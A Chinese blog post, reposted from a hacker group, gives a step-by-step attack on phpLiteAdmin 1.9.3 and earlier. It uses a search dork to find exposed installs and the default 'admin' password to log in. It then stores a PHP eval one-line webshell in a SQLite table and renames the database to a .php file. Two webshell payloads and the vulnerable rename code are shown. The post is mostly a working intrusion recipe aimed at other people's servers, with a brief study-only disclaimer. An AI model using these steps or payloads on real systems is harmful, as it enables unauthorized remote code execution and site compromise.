阿峰博客 阿峰'S blog

  • 首页
  • 移动安全
    • Android安全
    • iOS安全
    • APP安全
  • 新闻资讯
    • IT新闻
    • 安全资讯
  • 信息安全
    • WEB安全
    • 系统安全
    • 终端安全
    • 安全工具
  • 建站优化
    • 网站优化
    • 网络营销
  • 资源共享
  • 关于博客
    • 申请友链
    • 在线投稿
不忘初心,砥砺前行。
  1. 首页
  2. 信息安全
  3. 正文

phpliteadmin<=1.9.3漏洞登陆代码插入get Webshell

2013 年 1 月 17 日 2557点热度 0人点赞 0条评论

作者:小Dの马甲
来自:Silic Group Hacker Army
//BlackBap.Org
漏洞公布:[email protected]

I.漏洞利用
原文的作者公布的利用方式不详细,这里给一个详细的利用过程
首先,以

  1. inurl:phpliteadmin.php


为关键字进行搜索
打开结果页面,以默认密码“admin”登陆,然后在左侧“Create New Database [?]”创建一个数据库,名字任意,以”silic”为例
然后到主窗口的“Create new table on database ‘./silic.sqlite’”这里创建表段,Name名字填写”silic”,“Number of Fields:”写1就可以了

在接下来的操作中,Field还填silic,Type选择text,其他不用动,然后点击“creat”创建一个新表
这样,我们就成功的再“silic”数据库创建了一个只有一个字段“silic”的数据表“silic”
此时点击主窗口的“This table is empty. Click here to insert rows.”创建一条新数据

数据内容填写一句话木马

  1. <?php eval($_POST[silic]);?>


最好是不要带引号。

数据插入成功以后,就重命名数据库。因为截图是后来补得,所以上图的步骤是错的
重命名应该点击左侧的“./silic.sqlite”然后再选择主窗口的“Rename Database”
在“Rename database ‘./silic.sqlite’ to”后面的框框里面,写xxxxxx.php,此时有没有发发现原来的silic.sqlite数据库不见了?说明你已经得到了同目录下的webshell的后门了。

II.代码分析
我们先来看一下相关代码:

  1. line:250
  2. ……
  3. //user is renaming a database
  4. if(isset($_GET['database_rename']))
  5. {
  6.         $oldpath = $_POST['oldname'];
  7.         $newpath = $_POST['newname'];
  8.         if(!file_exists($newpath))
  9.         {
  10.                 copy($oldpath, $newpath);
  11.                 unlink($oldpath);
  12.                 $justrenamed = true;
  13.         }
  14.         else
  15.         {
  16.                 $dbexists = true;
  17.         }
  18. }
  19. ……
  20. line:4476
  21. else if($view==”rename”){
  22.         if(isset($dbexists)){
  23.                 echo “<div class=’confirm’>”;
  24.                 if($oldpath==$newpath)
  25.                 echo “Error: You didn’t change the value dumbass.”;
  26.                 else
  27.                 echo “Error: A database of the name ‘”.$newpath.”‘ already exists.”;
  28.                 echo “</div><br/>”;
  29.         }
  30.         if(isset($justrenamed)){
  31.                 echo “<div class=’confirm’>”;
  32.                 echo “Database ‘”.$oldpath.”‘ has been renamed to ‘”.$newpath.”‘.”;
  33.                 echo “</div><br/>”;
  34.         }
  35.         echo “<form action=’”.PAGE.”?view=rename&database_rename=1′ method=’post’>”;
  36.         echo “<input type=’hidden’ name=’oldname’ value=’”.$db->getPath().”‘/>”;
  37.         echo “Rename database ‘”.$db->getPath().”‘ to <input type=’text’ name=’newname’ style=’width:200px;’ value=’”.$db->getPath().”‘/> <input type=’submit’ value=’Rename’ name=’rename’ class=’btn’/>”;
  38.         echo “</form>”;
  39. }

上面代码很浅显啊,$_POST['oldname']和$_POST['newname']都没有做任何处理,就被赋值到了$oldpath和$newpath
最主要的是,代码中直接执行了copy($oldpath, $newpath),直接把数据库文件变成了php文件。

  1. SQLite format 3@
  2. ??+?tablexxxxxxCREATE TABLE xxx(aa TEXT)
  3. ??=<?php eval($_POST[c]);?>


中间各种0000填充,但是没有<>等符号阻挡我们的大PHP一句话解析~
成功~

注:目测到一个撒比插坏了,跟你说别加引号了:

  1. <?php $_GET[\'ts7\']($_POST[\'coupon\']);?>
标签: phpliteadmin漏洞
最后更新:2013 年 2 月 26 日

阿峰

保持饥渴的专注,追求最佳的品质

点赞
< 上一篇
下一篇 >

文章评论

取消回复

标签聚合
Wordpress xss漏洞 网络安全 渗透测试 perl 工具 关键字 端口扫描
最新 热点 随机
最新 热点 随机
安卓批量搜索分析Java 类/对象结构脚本工具 MAC下在Genymotion模拟器中使用IDA动态调试android安卓应用 Joy:一款用于捕获和分析网络内部流量数据的工具 One-Lin3r:懒人的福音,渗透测试单行化工具 EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具 国产网站恶意代码监测(网马监控)工具优化版
MAC下在Genymotion模拟器中使用IDA动态调试android安卓应用安卓批量搜索分析Java 类/对象结构脚本工具
信息安全意识培训-在网络上保护好自己 学信网有漏洞吗?求黑阔们检测 过D盾Web查杀/安全狗/护卫神的PHP免杀一句话WebShell Wfuzz:一款强大的Web Fuzz测试工具 emlog博客SEO网站设置方法 黑动漫@黑客的反击
最近评论
发布于 2 年前(07月07日) 小哥,可以帮忙把我的友链修改为 https://feifanblog.com 么?谢谢啦~
发布于 3 年前(07月23日) top.document.body.innerHTML=""; 这个是1.js 还是xss ...
发布于 3 年前(11月22日) 看错了,还以为是你买的register.com呢。。。
发布于 3 年前(10月22日) 大佬 求sql 放正系统注入工具
发布于 4 年前(05月27日) 感觉还是非常复杂的呢。。。。

COPYRIGHT © 2021 阿峰博客 阿峰'S blog. ALL RIGHTS RESERVED.

本站发布的内容仅限于学习和研究,请勿用于非法渗透和攻击,否则一切后果请自负;遵守法律法规,做一个合格的安全从业者。